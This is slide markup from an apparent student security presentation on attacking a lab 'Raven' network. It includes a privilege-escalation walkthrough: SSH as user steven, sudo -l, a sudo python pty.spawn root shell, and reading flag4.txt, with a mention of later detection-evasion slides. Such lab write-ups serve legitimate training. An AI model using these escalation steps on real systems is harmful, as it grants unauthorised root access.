          <a:p>
            <a:pPr marL="1892300" lvl="2" indent="-571500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Database name, username, password, and host name	</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="863600" lvl="1" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="406400" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2438" name="Google Shape;2438;p13"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="966621" y="3706282"/>
            <a:ext cx="20253488" cy="91097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2"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2443" name="Google Shape;2443;p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dirty="0"/>
              <a:t>Exploitation 4: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6600" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Privilege  Escalation</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="6600" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="6600" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2444" name="Google Shape;2444;p14"/>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17</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2445" name="Google Shape;2445;p14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="2295400"/>
            <a:ext cx="22942800" cy="9866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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Summarize the following:</a:t>
            </a:r>
            <a:endParaRPr sz="4400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="-508000" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How did you exploit the vulnerability? </a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="1892300" lvl="2" indent="-571500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>Run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1"/>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>steven@192.168.1.110</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> –p 22</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1892300" lvl="2" indent="-571500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Check for exact command that steven is authorized to use</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> –l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="1892300" lvl="2" indent="-571500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Steven run on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pyhton</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> application on raven websites.</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="1892300" lvl="2" indent="-571500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Used a python shell:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> python –c ‘import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pty;pty.spawn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(“/bin/bash/”)’</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="1892300" lvl="2" indent="-571500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cd /root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ls –la </a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="1892300" lvl="2" indent="-571500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Flag4.txt found and run: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cat flag4.txt</a:t>
            </a:r>
            <a:endParaRPr sz="4400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="406400" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="4400" dirty="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9"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2450" name="Google Shape;2450;p1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18</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2451" name="Google Shape;2451;p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
        <p:nvSpPr>
          <p:cNvPr id="2452" name="Google Shape;2452;p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dirty="0"/>
              <a:t>Exploitation 4: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6600" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Privilege  Escalation</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="6600" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="6600" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2453" name="Google Shape;2453;p15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="2295400"/>
            <a:ext cx="22942800" cy="9866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a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="1" indent="-508000" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A. Steven’s home directory, root directory and flag4.txt.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="1" indent="-228600" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="406400" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2454" name="Google Shape;2454;p15"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="731475" y="4858511"/>
            <a:ext cx="19184157" cy="8029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8"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2459" name="Google Shape;2459;p1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19</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2460" name="Google Shape;2460;p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
        <p:nvSpPr>
          <p:cNvPr id="2461" name="Google Shape;2461;p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dirty="0"/>
              <a:t>Exploitation 4: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6600" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Privilege  Escalation</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="6600" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="6600" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2462" name="Google Shape;2462;p16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="2295400"/>
            <a:ext cx="22942800" cy="9866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a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Summarize the following:</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="-508000" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What did the exploit achieve?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="1435100" lvl="1" indent="-571500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Flag4.txt file inside.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="863600" lvl="1" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="406400" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2463" name="Google Shape;2463;p16"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="914543" y="4844896"/>
            <a:ext cx="17702641" cy="82661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g13355dbaffb_2_0"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731377" y="85751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a:t>Introduction</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2331" name="Google Shape;2331;g13355dbaffb_2_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a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2332" name="Google Shape;2332;g13355dbaffb_2_0"/>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333" name="Google Shape;2333;g13355dbaffb_2_0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1317700" y="3034700"/>
            <a:ext cx="22081500" cy="831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1D1C1D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F8F8F8"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Good Morning everyone, today we as Gandalf The Hacker are going to use some attacking techniques to exploit and gain access to the Vulnerable network and provide our analysis as in how to avoid such practices. Our team comprises of four devilishly handsome Cybertech enthusiasts starting with Rishabh, Anthony, Jeffrey and myself Vishav. </a:t>
            </a:r>
            <a:endParaRPr sz="4800">
              <a:solidFill>
                <a:srgbClr val="1D1C1D"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="F8F8F8"/>
              </a:highlight>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="4800">
              <a:solidFill>
                <a:srgbClr val="1D1C1D"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="F8F8F8"/>
              </a:highlight>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800">
                <a:solidFill>
                  <a:srgbClr val="1D1C1D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F8F8F8"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Firstly with Anthony he will be presenting Network Topology &amp; Critical Vulnerabilities we found with Target 1 and Target 2, followed by Jeffrey who will be speaking about Exploits used to access the network, whereas Rishabh will be presenting ways to avoid detection once we have successfully entered the Network and lastly I’ll be presenting the conclusion of this presentation.</a:t>
            </a:r>
            <a:endParaRPr sz="4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pic>
        <p:nvPicPr>
          <p:cNvPr id="2468" name="Google Shape;2468;p17"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="731334" y="773067"/>
            <a:ext cx="22914825" cy="12246447"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2469" name="Google Shape;2469;p17"/>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Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>20</a:t>
            </a:fld>
            <a:endParaRPr sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
